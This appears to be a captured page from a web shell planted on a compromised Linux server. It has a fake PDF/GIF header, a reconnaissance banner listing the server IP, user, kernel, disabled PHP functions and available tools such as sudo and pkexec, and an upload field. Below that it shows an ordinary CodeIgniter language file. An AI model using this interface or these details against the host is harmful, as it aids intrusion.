%PDF-1.7 GIF89;
Server IP : 5.161.254.237 / Your IP : 216.73.216.252 Web Server : Apache System : Linux diamond.sialwebvps.com 4.18.0-553.8.1.el8_10.x86_64 #1 SMP Tue Jul 2 07:26:33 EDT 2024 x86_64 User : stellasp ( 1131) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/stellasp/public_html/application/language/english/ |
Upload File : |
<?php /****************************************** US English Admin Category Language ******************************************/ $lang['categories'] = 'Categories'; $lang['error_must_select'] = 'You must select a category to organize'; $lang['error_not_found'] = 'The requested category could not be found.'; $lang['organize_category'] = 'Organize "%s" Category'; $lang['organize'] = 'Organize'; $lang['category_id'] = 'Category ID'; $lang['category_form'] = 'Category Form'; $lang['name'] = 'Name'; $lang['slug'] = 'Slug'; $lang['description'] = 'Description'; $lang['excerpt'] = 'Excerpt'; $lang['sequence'] = 'Sequence'; $lang['image'] = 'Image'; $lang['seo_title'] = 'SEO Title'; $lang['meta'] = 'Meta Data'; $lang['message_category_saved'] = 'The category has been saved!'; $lang['error_file_upload'] = '<p>You did not select a file to upload.</p>'; //important. This must match the same error as generated by the file upload script of your language. $lang['message_delete_category'] = 'The category has been deleted.'; $lang['current_file'] = 'Current File'; $lang['confirm_delete_category'] = 'Are you sure you want to delete this category?'; $lang['add_new_category'] = 'Add New Category'; $lang['no_categories'] = 'There are currently no categories'; $lang['attributes'] = 'Attributes'; $lang['seo'] = 'SEO'; $lang['parent'] = 'Parent'; $lang['meta_data_description'] = 'ex. <meta name="description" content="We sell products that help you" />'; $lang['drag_and_drop'] = 'Drag and drop the products in the order you would like them to appear.'; $lang['sku'] = 'SKU'; $lang['price'] = 'Price'; $lang['sale'] = 'Sale';